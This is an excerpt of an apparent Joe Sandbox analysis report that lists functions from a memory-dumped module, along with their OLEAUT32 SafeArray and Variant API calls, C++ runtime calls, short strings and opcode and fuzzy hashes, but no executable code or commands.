VariantInit.OLEAUT32 ref: 6CE466DB
VariantInit.OLEAUT32 ref: 6CE466EA
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CE46700
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE4673A
VariantClear.OLEAUT32(?), ref: 6CE46747
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE46787
VariantClear.OLEAUT32(?), ref: 6CE46794
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE46849
VariantClear.OLEAUT32(?), ref: 6CE4685A
VariantClear.OLEAUT32(?), ref: 6CE46861

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
String ID:
API String ID: 551789342-0
Opcode ID: 95f78c79083fb89eacf8d5ef09c0e6ec53e2d8ebf4150282e184416dbbed5414
Instruction ID: f0ebaa64d0eeb7532e2bd61e2b4b397459d1e7e697dabc5c672edad57038b5f4
Opcode Fuzzy Hash: 95f78c79083fb89eacf8d5ef09c0e6ec53e2d8ebf4150282e184416dbbed5414
Instruction Fuzzy Hash: 115179762093059FC700CF64D844A9BBBF9EF99718F10865EF9549B350EB34E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE46B10 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CE46C8B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CE46CA6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CE46CC7

Part of subcall function 6CE45760: std::tr1::_Xweak.LIBCPMT ref: 6CE45769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CE46CF9

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE46F13
InterlockedCompareExchange.KERNEL32(6CECC6A4,45524548,4B4F4F4C), ref: 6CE46F34

Strings

.l, xrefs: 6CE46ECB, 6CE46EEC, 6CE46ECE
.l, xrefs: 6CE46F41

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID: .l$ .l
API String ID: 2722669376-2945158243
Opcode ID: f47ef305eacf806882502c7854249093bf4b04c75f8b75414a3789649c2ed609
Instruction ID: 236b961af675d5f7a54d506b129dc459a4b4a7946a259b35aaa3e00ecc715bc1
Opcode Fuzzy Hash: f47ef305eacf806882502c7854249093bf4b04c75f8b75414a3789649c2ed609
Instruction Fuzzy Hash: E9D1DFB1A112049FDB00DFA4C885BEE77F8AF45308F348469E959EBB80D775E904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE25A30 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE25ACB
__CxxThrowException@8.LIBCMT ref: 6CE25AE0
std::exception::exception.LIBCMT ref: 6CE25B18
__CxxThrowException@8.LIBCMT ref: 6CE25B2D

Strings

0Bl, xrefs: 6CE25AF3
0Bl, xrefs: 6CE25AD9
0Bl, xrefs: 6CE25B26
0Bl, xrefs: 6CE25B22, 6CE25B15

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc
String ID: 0Bl$0Bl$0Bl$0Bl
API String ID: 3153320871-3678277316
Opcode ID: d805295723e51a81e24287b362031a22e4e7122218c6d9e20581c705e1220599
Instruction ID: 61d20e9d91375433ee2a2c8e225fbecbc8ddd02c942bbced5da16c6c979d3f97
Opcode Fuzzy Hash: d805295723e51a81e24287b362031a22e4e7122218c6d9e20581c705e1220599
Instruction Fuzzy Hash: 0C3177B1910608AFC714DF98D941ADAF7F8FF44754F20866EE81997B40EB34E504CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4840E Relevance: 13.8, APIs: 9, Instructions: 332COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE484BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE484D2
SafeArrayGetElement.OLEAUT32 ref: 6CE4850A

Part of subcall function 6CE43A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE43B71
Part of subcall function 6CE43A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE43B83

Part of subcall function 6CE469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CE46A08
Part of subcall function 6CE469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE46A15
Part of subcall function 6CE469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE46A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Part of subcall function 6CE3DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CE3DFF6
Part of subcall function 6CE3DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE3E003
Part of subcall function 6CE3DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE3E02F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID:
API String ID: 959723449-0
Opcode ID: 37a79aaf1b5a1258c1fb64bdc2dc1d96954007b979bd98b517310588a9b143f1
Instruction ID: 1284a759c02d9e6aaba1a490fd31589c0987233bdbf8f7bee4d3a278b87ef8e4
Opcode Fuzzy Hash: 37a79aaf1b5a1258c1fb64bdc2dc1d96954007b979bd98b517310588a9b143f1
Instruction Fuzzy Hash: 17C17270A012049FDB10DFA8DC80FADB7B9AF85308F708599E519EB786DB75E984CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE44170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE441AF
VariantInit.OLEAUT32(?), ref: 6CE441B5
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE441C0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CE441F5
VariantClear.OLEAUT32(?), ref: 6CE44201
std::tr1::_Xweak.LIBCPMT ref: 6CE44450
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4446D
VariantClear.OLEAUT32(?), ref: 6CE4447D
VariantClear.OLEAUT32(?), ref: 6CE44483

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: d2698134fe6da4e330c76b7c5f93b1a43df4cbbd3338f3607a15cbad0c049c3c
Instruction ID: e467244197490f03d1555185670e198c66416b4006d62d6e6afca58083bad191
Opcode Fuzzy Hash: d2698134fe6da4e330c76b7c5f93b1a43df4cbbd3338f3607a15cbad0c049c3c
Instruction Fuzzy Hash: D1B146756006499FCB14DF98C884DEAB3F9BF8D310F15856DE50AABB90DA34F841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4C850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE4C88F
VariantInit.OLEAUT32(?), ref: 6CE4C895
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE4C8A0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CE4C8D5
VariantClear.OLEAUT32(?), ref: 6CE4C8E1
std::tr1::_Xweak.LIBCPMT ref: 6CE4CB1C
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4CB39
VariantClear.OLEAUT32(?), ref: 6CE4CB49
VariantClear.OLEAUT32(?), ref: 6CE4CB4F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 21347d8cba0ffe13fa35e34a583bcac0efe7dd65cab9e65b606f98789dd20173
Instruction ID: ef525dac4a5bf37083bb6e59049ee76ff3f7584ec3a50068c87e45a1f30a2a0f
Opcode Fuzzy Hash: 21347d8cba0ffe13fa35e34a583bcac0efe7dd65cab9e65b606f98789dd20173
Instruction Fuzzy Hash: 0CB13775600609AFCB14DF99C884DAEB7F5BF8D310F15866DE506ABB91CA34F841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4C530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE4C56F
VariantInit.OLEAUT32(?), ref: 6CE4C575
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE4C580
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE4C5B5
VariantClear.OLEAUT32(?), ref: 6CE4C5C1
std::tr1::_Xweak.LIBCPMT ref: 6CE4C7D4
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4C7F1
VariantClear.OLEAUT32(?), ref: 6CE4C801
VariantClear.OLEAUT32(?), ref: 6CE4C807

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 5138ac9a8eea391e44144efca8005bae859b23fc5952c24cf6701c60c29d3efe
Instruction ID: 1471977e233b490eddc316ade582c2fa57663d4fb2d5d45ce77e01efb4b29c1a
Opcode Fuzzy Hash: 5138ac9a8eea391e44144efca8005bae859b23fc5952c24cf6701c60c29d3efe
Instruction Fuzzy Hash: 8BA148766006099FCB14DFA9C884DAEB7F9BF8D310F15856DE506ABB91CB34B841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE46880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE468B2
VariantInit.OLEAUT32(?), ref: 6CE468BD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CE468D7
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE468FD
VariantClear.OLEAUT32(?), ref: 6CE46909
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE46923
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE46981
VariantClear.OLEAUT32(?), ref: 6CE4699E
VariantClear.OLEAUT32(?), ref: 6CE469A4

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
String ID:
API String ID: 3529038988-0
Opcode ID: b517c4f7539fde4e25be8b56b871f10181cd1e32ff4c945c0b66e3926c5ad76d
Instruction ID: 190295a022cafc4dda1fc4fb3c93c279b32fb1a4f4d824def29a8ec91777cef6
Opcode Fuzzy Hash: b517c4f7539fde4e25be8b56b871f10181cd1e32ff4c945c0b66e3926c5ad76d
Instruction Fuzzy Hash: 9A4173B2E00209DFDB00DFA5D844AEEBBB8FF59314F14815AE505E7340E775A905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3DB30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE3DB5E
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE3DB6E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CE3DB82
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE3DBF1
VariantClear.OLEAUT32(?), ref: 6CE3DBFB

Strings

9Kl, xrefs: 6CE3DBA6, 6CE3DBD6, 6CE3DBAE
1l, xrefs: 6CE3DB46

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
String ID: 9Kl$1l
API String ID: 182531043-2405703077
Opcode ID: 28c6045c4c5cd87e27ca16c8d29ca42c7da569ee1b014786566cfdc485f44262
Instruction ID: 2e910d4906ac4dfebad05fbf3166bf86d109c24767ccece1f7262b4b975a6896
Opcode Fuzzy Hash: 28c6045c4c5cd87e27ca16c8d29ca42c7da569ee1b014786566cfdc485f44262
Instruction Fuzzy Hash: A931A27AA00205AFD700DF95C844EEEB7F8FF99710F25815AF915A7700D734A901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3C020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE3C074
VariantInit.OLEAUT32(?), ref: 6CE3C07B
VariantInit.OLEAUT32(?), ref: 6CE3C082
VariantInit.OLEAUT32(?), ref: 6CE3C089
VariantClear.OLEAUT32(?), ref: 6CE3C312
VariantClear.OLEAUT32(?), ref: 6CE3C319
VariantClear.OLEAUT32(?), ref: 6CE3C320
VariantClear.OLEAUT32(?), ref: 6CE3C327

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 1d71d86b5200899338da8c9a7154df023490e4aed8d6caa2c00a215aebf1f44b
Instruction ID: ac563abc5c826f242ea66477063039bdd4a9bca7f92ce89cbe4c7c2c88f5e08d
Opcode Fuzzy Hash: 1d71d86b5200899338da8c9a7154df023490e4aed8d6caa2c00a215aebf1f44b
Instruction Fuzzy Hash: 97C146726087209FC300EF68C88095AB7F5BFC9708F248A8DE5999B765D735E845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE316B0 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 487COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::tr1::_Xweak.LIBCPMT ref: 6CE31B53
std::_Xinvalid_argument.LIBCPMT ref: 6CE31B5D
std::exception::exception.LIBCMT ref: 6CE31C43
__CxxThrowException@8.LIBCMT ref: 6CE31C58

Strings

0Bl, xrefs: 6CE31C51
invalid vector<T> subscript, xrefs: 6CE31B58

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
String ID: 0Bl$invalid vector<T> subscript
API String ID: 3098024973-1347025202
Opcode ID: 32d332361533920cfd1dd75a87c616868e024869ff0ee6e50bded3bafc41da08
Instruction ID: db9617d2ebd42279ad096678f01370ffb25aab7ee31e2121e92625004b9d88d4
Opcode Fuzzy Hash: 32d332361533920cfd1dd75a87c616868e024869ff0ee6e50bded3bafc41da08
Instruction Fuzzy Hash: AE222AB1C007199FCB14CFA4C4809EEBBF5BF44314F618A6DD45AAB750E734AA89CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE43C10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

SafeArrayGetElement.OLEAUT32(?,?,CB65479A), ref: 6CE43C49
VariantInit.OLEAUT32(?), ref: 6CE43C81
VariantClear.OLEAUT32(?), ref: 6CE43D26
VariantClear.OLEAUT32(?), ref: 6CE43D30
VariantClear.OLEAUT32(?), ref: 6CE43D89

Strings

ljl, xrefs: 6CE43C24

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Clear$ArrayElementInitSafe
String ID: ljl
API String ID: 4110538090-1208423595
Opcode ID: 72fe20256698396e48dc1be8063c740ae50d413ebc4e3000d4b19417a936da08
Instruction ID: 4c9126d825a1a269e1bf353637b2c36ec5dbf5dac16dde4cb102a00da3c336d6
Opcode Fuzzy Hash: 72fe20256698396e48dc1be8063c740ae50d413ebc4e3000d4b19417a936da08
Instruction Fuzzy Hash: 53616B76A002499FCB00DFA8D8809AEB7B9FF49314F2585AEE515EB750C731AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE51FD0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 175COMMON

Download Yara Rule

APIs

